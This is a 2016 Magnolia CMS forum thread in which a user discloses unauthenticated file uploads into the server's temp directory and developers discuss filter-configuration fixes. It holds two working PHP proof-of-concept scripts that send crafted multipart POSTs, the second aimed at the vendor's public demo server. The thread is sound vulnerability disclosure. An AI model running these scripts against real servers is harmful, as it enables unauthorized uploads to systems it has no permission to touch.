Main Content

Magnolia Community Forums: Development: fileupload into magnolia-tmp-dir


  • frankfreaky
    frankfreaky
    Full name: Benjamin Brupbacher
    Posts: 7
    Last post: Nov 15, 2016 6:13:05 PM
    Registered on: Aug 5, 2015
    fileupload into magnolia-tmp-dir
    #1 by frankfreaky on Sep 7, 2016 8:31:38 PM

    hi there

    i was able to upload files into the magnolia-tmp-dir without any authentification. i stumbled upon it, when one of our magnolia websites had strange files in its tmp. there were some robot-requests that uploaded the stuff. here is the poc as a php-script.

    guess it needs a cleaner, similar like in this issue:
    https://jira.magnolia-cms.com/browse/MAGNOLIA-5763


    <?php

    /*

    poc fileupload magnolia

    php script for php cli
    adjust the $host, $path, $port, $filePath, $fileName to your needs

    */

    $host = "localhost";
    $path = "/magnoliaAuthor/";
    $port = "8080";
    $filePath = "/Users/beni/Desktop";
    $fileName = "test1.jpg";

    $url = 'http://'.$host.':'.$port.$path;

    $boundary = "benisboundaryBl9Kx9ONpfAmwkdA";
    $content = file_get_contents($filePath."/".$fileName);
    $blankSize = 256;

    $data = "------$boundary\r\n";
    $data .= "Content-Disposition: form-data; name=\"myFile\"; filename=\"$fileName\"\r\n";
    $data .= "Content-Type: application/octet-stream\r\n\r\n";
    $data .= "$content\r\n";
    $data .= "------$boundary\r\n";
    $data .= "Content-Disposition: form-data; name=\"myBlankStuff\"\r\n\r\n";
    for($i = 0;$i < $blankSize*100;$i++){
    $data .= " ";
    }
    $data .= "\r\n";
    $data .= "------$boundary--\r\n\r\n\r\n\r\n";

    $contentLength = strlen($data)-$blankSize;

    $packet = "POST ".$url." HTTP/1.1\r\n";
    $packet .= "Host: ".$host."\r\n";
    $packet .= "User-Agent: POC Magnolia Fileupload\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=----$boundary\r\n";
    $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $packet .= "Content-Length: ".$contentLength."\r\n\r\n\r\n\r\n";
    $packet .= $data;

    $response = doRequest($packet);
    echo "DONE\n";

    function doRequest($packet) {

    global $host, $port;

    $ock = fsockopen($host,$port);
    stream_set_timeout($ock, 5);
    if (!$ock) {
    echo 'No response from '.$host."\n";
    die;
    }

    fputs($ock,$packet);
    $html = '';
    while (!feof($ock)) {
    $html .= fgets($ock);
    }
    fclose($ock);
    return $html;

    }

    ?>

  • frankfreaky
    frankfreaky
    Full name: Benjamin Brupbacher
    Posts: 7
    Last post: Nov 15, 2016 6:13:05 PM
    Registered on: Aug 5, 2015
    Re: fileupload into magnolia-tmp-dir
    #2 by frankfreaky on Oct 11, 2016 11:36:56 AM

    ::bump::

    is this problem going to be addressed?

  • cmeier
    cmeier
    Full name: Christoph Meier
    Posts: 195
    Last post: Apr 18, 2017 5:34:26 AM
    Re: fileupload into magnolia-tmp-dir
    #3 by cmeier on Oct 17, 2016 1:05:11 PM

    Hello Benjamin

    Which version of Magnolia are you using?

  • frankfreaky
    frankfreaky
    Full name: Benjamin Brupbacher
    Posts: 7
    Last post: Nov 15, 2016 6:13:05 PM
    Registered on: Aug 5, 2015
    Re: fileupload into magnolia-tmp-dir
    #4 by frankfreaky on Oct 18, 2016 2:45:40 PM

    i was able to upload files to https://demo.magnolia-cms.com which is 5.4.9…

    here a bit cleaned version of the poc above

    <?php

    /*

    poc fileupload magnolia

    php script for php cli
    adjust the $host, $path, $ssl, $filePath, $fileName to your needs

    */

    $host = "demo.magnolia-cms.com";
    $path = "/";
    $ssl = true;
    $filePath = "/Users/beni/Desktop";
    $fileName = "yourfile.png";

    if($ssl) {
    $schema = "https";
    $port = "443";
    } else {
    $schema = "http";
    $port = "80";
    }

    $url = "$schema://".$host.':'.$port.$path;

    $boundary = "benisboundaryBl9Kx9ONpfAmwkdA";
    $content = file_get_contents($filePath."/".$fileName);
    $blankSize = 256;

    $data = "------$boundary\r\n";
    $data .= "Content-Disposition: form-data; name=\"myFile\"; filename=\"$fileName\"\r\n";
    $data .= "Content-Type: application/octet-stream\r\n\r\n";
    $data .= "$content\r\n";
    $data .= "------$boundary\r\n";
    $data .= "Content-Disposition: form-data; name=\"myBlankStuff\"\r\n\r\n";
    for($i = 0;$i < $blankSize;$i++){
    $data .= " ";
    }
    $data .= "\r\n";
    $data .= "------$boundary--\r\n\r\n\r\n\r\n";

    $contentLength = strlen($data)-$blankSize;

    $packet = "POST ".$url." HTTP/1.1\r\n";
    $packet .= "Host: ".$host."\r\n";
    $packet .= "User-Agent: POC Magnolia Fileupload\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=----$boundary\r\n";
    $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $packet .= "Content-Length: ".$contentLength."\r\n\r\n\r\n\r\n";
    $packet .= $data;

    if($ssl) {
    $sock = fsockopen('ssl://'.$host,$port);
    } else {
    $sock = fsockopen($host,$port);
    }
    stream_set_timeout($sock, 5);

    if (!$sock) {
    echo 'No response from '.$host."\n";
    die;
    }

    fputs($sock,$packet);
    $response = '';
    while (!feof($sock)) {
    $response .= fgets($sock);
    }
    fclose($sock);

    echo "############### REQUEST ##############\n";
    echo $packet;
    echo "############### RESPONSE #############\n";
    echo $response;
    echo "################ DONE ################\n";


    ?>


    you can check if the file is in the demo instance with the groovy console:

    myList = Path.getTempDirectory().listFiles()
    myList.each{println it}

  • cmeier
    cmeier
    Full name: Christoph Meier
    Posts: 195
    Last post: Apr 18, 2017 5:34:26 AM
    Re: fileupload into magnolia-tmp-dir
    #5 by cmeier on Oct 18, 2016 2:57:47 PM

    Thanks a lot Benjamin for providing the infos.

    We will investigate the issue.

  • had
    had
    Full name: Jan Haderka
    Posts: 1,405
    Last post: Feb 6, 2017 1:59:05 PM
    Re: fileupload into magnolia-tmp-dir
    #6 by had on Oct 19, 2016 11:58:07 AM

    Hi Ben,

    all you have to do is configure bypasses to make MultipartRequestFilter available only in parts of public webpage where you require functionality, e.g. at minimum for /.magnolia and/or at pages where you want to allow people to upload files.
    Similarly as you should disable access to admin central on production public instances from all but internal IP addresses.

    HTH,
    Jan

  • frankfreaky
    frankfreaky
    Full name: Benjamin Brupbacher
    Posts: 7
    Last post: Nov 15, 2016 6:13:05 PM
    Registered on: Aug 5, 2015
    Re: fileupload into magnolia-tmp-dir
    #7 by frankfreaky on Oct 19, 2016 6:27:42 PM

    yeah youre right, hardening the security is definitely a good idea... but i think its a workaround and the problem itself would not be solved...
    as soon as you have a public upload form, you have to enable the MultipartRequestFilter and the problem is here again...

  • had
    had
    Full name: Jan Haderka
    Posts: 1,405
    Last post: Feb 6, 2017 1:59:05 PM
    Re: fileupload into magnolia-tmp-dir
    #8 by had on Oct 24, 2016 5:09:33 PM

    We will be disabling this filter on public by default. If you want to have a form in which you allow upload, you have 2 options, either re-enable the filter for page/uri in action of the form or handle it in form processor/model that is handling the form and process multipart yourself. Whether or not you choose to use the filter, you will always have issue w/ ensuring that you cleanup after you processed the data.

  • had
    had
    Full name: Jan Haderka
    Posts: 1,405
    Last post: Feb 6, 2017 1:59:05 PM
    Re: fileupload into magnolia-tmp-dir
    #9 by had on Oct 24, 2016 5:11:29 PM

    For the reference: https://jira.magnolia-cms.com/browse/MAGNOLIA-6830

  • frankfreaky
    frankfreaky
    Full name: Benjamin Brupbacher
    Posts: 7
    Last post: Nov 15, 2016 6:13:05 PM
    Registered on: Aug 5, 2015
    Re: fileupload into magnolia-tmp-dir
    #10 by frankfreaky on Nov 10, 2016 12:24:03 PM

    hey guy… thx 4 the help…

    today i also fixed the filter config on my servers... i checked the configuration on demo.magnolia-cms.com and i think some stuff has to be corrected in the filter config (please correct me when im wrong):
    1. there is a "not = true" property missing under config:/server/filters/multipartRequest/bypasses
    2. the filter config:/server/filters/multipartRequest should be placed under the config:/server/filters/uriSecurity filter node, without that its still possible to upload unauthenticated (i hope this has no side effects)

    PS: i cant access https://jira.magnolia-cms.com/browse/MAGNOLIA-6830, are some issues confidential?

  • frankfreaky
    frankfreaky
    Full name: Benjamin Brupbacher
    Posts: 7
    Last post: Nov 15, 2016 6:13:05 PM
    Registered on: Aug 5, 2015
    Re: fileupload into magnolia-tmp-dir
    #11 by frankfreaky on Nov 15, 2016 6:13:05 PM

    sorry... it has side effects:
    moving the multiPart filter under the uriSecurity filter breaks the activation...

    deactivating the whole filter does also breaks the activation, so there seems no perfect solution at the time.

You don't have the permission to post on this thread

Sign in

To login on this forum, you can use your Magnolia Forge, Support or Partner account, or, below, your Google, Yahoo! or OpenID account. If you have trouble logging in, or any other sort of issue, please let us know in the Meta forum, on the user-list, or simply by email at forum-admin at magnolia-cms dot com.

* Required

... or sign in with:

  • icon http://{your-openid-url}
  • icon
  • icon https://me.yahoo.com/